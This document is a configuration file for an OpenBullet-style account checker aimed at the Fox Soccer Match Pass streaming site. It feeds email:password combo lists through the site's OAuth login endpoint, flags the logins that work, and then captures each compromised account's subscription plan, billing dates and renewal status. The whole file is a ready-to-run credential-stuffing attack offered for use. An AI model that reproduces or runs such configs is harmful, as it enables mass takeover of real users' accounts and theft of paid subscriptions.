[SETTINGS]
{
  "Name": "FoxSoccerMatchPass",
  "SuggestedBots": 50,
  "LastModified": "2018-06-08T03:44:39.4739171+00:00",
  "AdditionalInfo": "",
  "Author": "B1rdY",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#ID PARSE "<SOURCE>" LR "{\"id\":\"" "\",\"code" Recursive=FALSE -> VAR "ID" "" "" 
#REQUEST_LOGIN REQUEST POST "https://www.foxsoccermatchpass.com/api/user/oauth/token" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&grant_type=password&client_id=42cc360e-6fbb-4472-9437-2f088b8730de" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: Referer: https://www.foxsoccermatchpass.com/en/account" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "400" 
  KEYCHAIN Success OR 
    KEY "access_token" 
#access_token PARSE "<SOURCE>" LR ":\"" "\"" Recursive=FALSE -> VAR "access_token" "" "" 
REQUEST GET "https://www.foxsoccermatchpass.com/api/user/api/users/v1/subscription/myaccount" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&grant_type=password&client_id=<ID>&<access_token>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: application/json,text/plain,*/*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "authorization: bearer <access_token>" 
  HEADER "device_id: <ID>" 
  HEADER "device_type: web" 
  HEADER "referer: https://www.foxsoccermatchpass.com/en/account" 
#PLAN PARSE "<SOURCE>" LR "nTag\":\"" "\"" Recursive=FALSE -> CAP "PLAN" "" "" 
#STARTING_BILL_DATE PARSE "<SOURCE>" LR "te\":\"" "T" Recursive=FALSE -> CAP "BILL DATE" "" "" 
#BILLING_END_DATE PARSE "<SOURCE>" LR "ndDate\":\"" "T" Recursive=FALSE -> CAP "BILLING END DATE" "" "" 
#RENEW PARSE "<SOURCE>" LR "w\":" "," Recursive=FALSE -> CAP "RENEW" "" "" 
